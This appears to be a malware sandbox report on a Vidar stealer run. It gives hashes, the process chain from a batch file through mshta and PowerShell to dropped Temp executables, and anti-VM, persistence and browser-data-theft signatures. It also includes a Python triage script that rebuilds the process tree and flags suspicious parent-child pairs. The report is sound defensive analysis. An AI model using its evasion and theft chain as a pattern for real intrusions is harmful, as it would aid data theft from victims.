SHA512 f1177b154f331f0b5a7a5596e9f53abb962396a02096eaea6a04796305858fa2115e8705dfdb7e45dd7b091433aa48e0aad7c0b36d680ac76ffd26acca0c7714

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab8719fba93379761f0b49bfab5802f3
SHA1 99c99791c1b19472c503bb5350e6a051dc9defbe
SHA256 2194464755f14a6743e559420f58357a3c3a57ab7ccde134b0e6f6b66d486b36
SHA512 acdde94e7771e83f9a100738bf749aa9bd3f47a62e60cb6528b1ac6efd38c4959e224f7ebfd2113c0f9f2faa5e1470a16e42d2f7737c1d7ba3f3fb367799ca50

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8cd250bfe0106ed9f4378b50089abfb3
SHA1 de79dd61b8574fd20b77bdc4e6b76a04952f38f7
SHA256 09614cd049213f52962b8e40985cbdb81838c215abada5d8c354fd9a8500a5b5
SHA512 78b373f55545ecbebcb7cfceb0b70031337c4b504fae6947c151e0a9e7915b03fed48f57697136e2b13f0ed4b12b3f9db11c47e4a7bca0b3e1db02f003cd2002

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc61746e7a7087da5dd7bddeb1348ed5
SHA1 86453e60aa43f660cc937df5d7ef498e266e2348
SHA256 114b740b760552124b76835fa4f0c62b1e25813bd1815778c014e45a9fac01a0
SHA512 79ecaf417796b3da8d5547b230b7f56dd11fac27a31579bf880a8f311ce2b85e53385985a659fa0141414403693d03c485065097242aa557f095042ddb5a021c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ec61140c17cce25c33c313f2ca9c7d64
SHA1 107683359b722dbd82fdf536508bc486ed7edc0d
SHA256 1039b3946a5a58116fdce551426899a12262091f56662a88707d20fdfd2d281a
SHA512 82625e73a1740e8020e5f5ee1356d32dd4fd87d867749c31129d24e0d690c88e9f0682f763edd5592e37e685ded937964b529e076c119aec4008e09a0055fd2f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9cb00248af7d986d59ff7564a0021c26
SHA1 05dd77e1ce0ec33a5f7ed18b77c618b6633a1907
SHA256 38d9ee9bcec098692d7aa941da023621a30356565922bb84b72229072c2215d9
SHA512 67183049a0c19c5b2691dd4510bbc8ee5f2696aa47b90d8a63e41c970c72584df161eab067000215545c4d9896979ca9094a080a5ed824d66a44e08875cd20fb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 475455bc0f01f431a5bd14213f14723e
SHA1 fcab0b863f4eff897090496cd1ef167024c3ed59
SHA256 1f897160b857b990e07b27b0d897f6d5491c7ae8922c5f6274fe5e0384c3b4a9
SHA512 5d874a1f1fb2a547de37975ea1f03387a44778111b9c38191a5570b129f9bcae9d2e777911e32c6dc0c6423a3e04b0ecfa1772f28a14dc3df158462a354685b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 45c2188e0e14a49b3ca192fd8562c390
SHA1 9dd8e7d3fd894b71370cb9ed6b16c01dfb9199e6
SHA256 7a5983b136ba33052c3afbd2f28aae864c92c85e8825b6792023ca633c42ffea
SHA512 9b0d06cfd2c98f200909753691fe94400cf737350345ab14b875af9d7042304d51802bddf968c316e2cfb9723a0f717493c6e7af7a9b6d7d33407dc66cd48ec7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 79024d2857e36c69e9a7ff9af88685b3
SHA1 402bfa1fe9ad3f8a95950e73dc122d9f6e489b2f
SHA256 c1f3d68cbb6b16fcd4cdd058cfc552e1a9e53287943b526f7972fddaf66063c1
SHA512 1ec33ffb8162249e00b01cd3323fb1b109f1ca6685ff1b59042f481b178f1f1a91f2428c3fe7139b9a6b0d7bcaf00d77ad133267ccfa60224f948747a1858b58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8d0bf05b2d6fc4de2bf89527cc737251
SHA1 decf03ac94097bf1ffa1ca7a749762fb45bf3c87
SHA256 6c943789916ad49443d6c1a36db35c55109a1a2b1a22fb4cfbc05778a78634e9
SHA512 4face25a271a571de69a1302faa26540687385706134548a8b5c4e0dabe4795bc964a7c3c62b5dd48ec131e21feab3aa8efe4d760683c1790ae3feecf9eb863f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d4a4869e977a58178f48d651cbb2b1ce
SHA1 ead2b96cb04ff6177b916c01bbe47c719d5452c0
SHA256 ee19581396c94386bdace1cd7004681b4db47c4db35ac4ebede65f68e972808d
SHA512 aacd5a827a29c38c679711a21cdbdfeb53d1e545847688414136e53fadbcd7d30427c8334375e96f0a329794b07cdbdcd18a5b940f833eea41dc9a9b92d2109e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 26f580c63395311eece249695b3c7a46
SHA1 0df42b2f25ee63a344e7222291f684e06b3dd9c3
SHA256 02df7500c49b246b2821d12b698ff28fc73261d3fd68ee65b3f9a49eebd576f8
SHA512 681e63061343227100c8badacfd4a144ab870eed3b5d50c31b4f5a5ae9fed9834472497e83ecff33a6aadeec91880e6d65497b6c09220763f4a37bf0a8d1e09a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9d236e0516c4c00f026b5de80a7907af
SHA1 f972d3364de93a972e2bdea631ac2951f584fe3d
SHA256 0c8c8f674934dda01f9ba9d9bfd624979787d882b11d9eadd893fee2adf33e84
SHA512 b92e0a617ad7eff9ae2c773d686b8ae61e550ac98aab2886865484375dece3ed6a1a549f4cc466951911524eb7aa755d7bb21abbee147a552ce06148370ee5a5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e4012c4abd841ecef6c0ca7856c65ac4
SHA1 bd50d2ef78d4e2d22e1a436da8d172b2dc230380
SHA256 c4da21294c72ce9a15a61d5b6eea5056478b1935bc89ca4fcdf5d8e35ab640ae
SHA512 7f433ca0809554dc596e99055ff0880b3d703ce1b5bede7aea8ec72c5ff6564f24c5ecd0dae61f15d5f561563792bacb612270473aa26460c5f862b406191f15

Analysis: behavioral14

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:28

Platform

win10v2004-20250217-en

Max time kernel

34s

Max time network

36s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860889933168" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
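The schtasks.exe, timeout.exe, mshta.exe and powershell.exe rows in this detonation only make sense as a chain, and the WriteProcessMemory records further down give the parent/child pairs needed to rebuild it. The Python below is an added example, not part of this report or of the sandbox: it parses those records (a constructed sample, copied from this detonation with the repeated rows removed), rebuilds the process tree and applies a few triage rules. The rule names and the LOLBin list are the example's own heuristics. One detail the records force you to handle: PID 1232 appears first as mshta.exe and later as bgUvqLl.exe, so nodes are keyed on (PID, image) rather than PID alone, otherwise two processes collapse into one.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample: the distinct "wrote to memory" records of this detonation,
# copied from the report with repeated rows removed.
SAMPLE_EVENTS = r"""
PID 3772 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3064 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2004 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 224 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3064 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1232 wrote to memory of 1084 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1084 wrote to memory of 4292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4292 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4504 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3900 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 4504 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
"""

# "PID <src> wrote to memory of <dst> N/A <src image> <dst image>"; the second path is
# located by its drive-letter prefix so image paths containing spaces still split.
EVENT_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) ([A-Za-z]:\\.+)$")
USER_TEMP_RE = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Example's own lists: signed Windows binaries that should not be launching script hosts.
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

def basename(image):
    return PureWindowsPath(image).name

def parse_events(text):
    """Distinct (parent, child) edges in first-seen order; a node is (pid, image path)."""
    edges, seen = [], set()
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        src_pid, dst_pid, src_img, dst_img = m.groups()
        edge = ((int(src_pid), src_img), (int(dst_pid), dst_img))
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges

def build_tree(edges):
    children, targets = defaultdict(list), set()
    for parent, child in edges:
        children[parent].append(child)
        targets.add(child)
    roots = [p for p in dict.fromkeys(p for p, _ in edges) if p not in targets]
    return roots, children

def render_tree(nodes, children, depth=0):
    lines = []
    for node in nodes:
        lines.append("  " * depth + f"{node[0]} {basename(node[1])}")
        lines.extend(render_tree(children.get(node, []), children, depth + 1))
    return lines

def triage(edges):
    findings, images_by_pid = [], defaultdict(set)
    for parent, child in edges:
        images_by_pid[parent[0]].add(parent[1])
        images_by_pid[child[0]].add(child[1])
        p, c = basename(parent[1]).lower(), basename(child[1]).lower()
        if p in LOLBIN_PARENTS and c in SCRIPT_HOSTS:
            findings.append(("lolbin_spawns_script_host", parent[0], child[0]))
        if USER_TEMP_RE.match(child[1]):
            findings.append(("executable_in_user_temp", parent[0], child[0]))
            # A Temp binary writing into a fresh copy of itself is the shape self-injection
            # leaves in sandbox logs; confirm with a memory dump before calling it hollowing.
            if parent[1].lower() == child[1].lower():
                findings.append(("same_image_child_in_user_temp", parent[0], child[0]))
        if c == "schtasks.exe":
            findings.append(("scheduled_task_created", parent[0], child[0]))
        if c == "timeout.exe":
            findings.append(("execution_delay", parent[0], child[0]))
    for pid, images in images_by_pid.items():
        if len(images) > 1:  # PID reuse: one number, two processes over the run
            findings.append(("pid_reuse", pid, sorted(basename(i) for i in images)))
    return findings

def analyze(text=SAMPLE_EVENTS):
    edges = parse_events(text)
    roots, children = build_tree(edges)
    return {"tree": render_tree(roots, children), "findings": triage(edges)}

if __name__ == "__main__":
    result = analyze()
    print("\n".join(result["tree"]))
    for finding in result["findings"]:
        print("FINDING", *finding)
```

Run against the sample, the tree has a single root (the cmd.exe that ran am_no.bat) and the findings line up with the signature headings in this detonation: the timeout delay, the schtasks persistence, mshta.exe handing off to powershell.exe, the drop chain living entirely under the user's Temp directory, and q3na5Mc.exe writing into a second instance of itself. The same parser works on the other behavioral runs in this report as long as their rows keep the "PID X wrote to memory of Y" wording.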

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
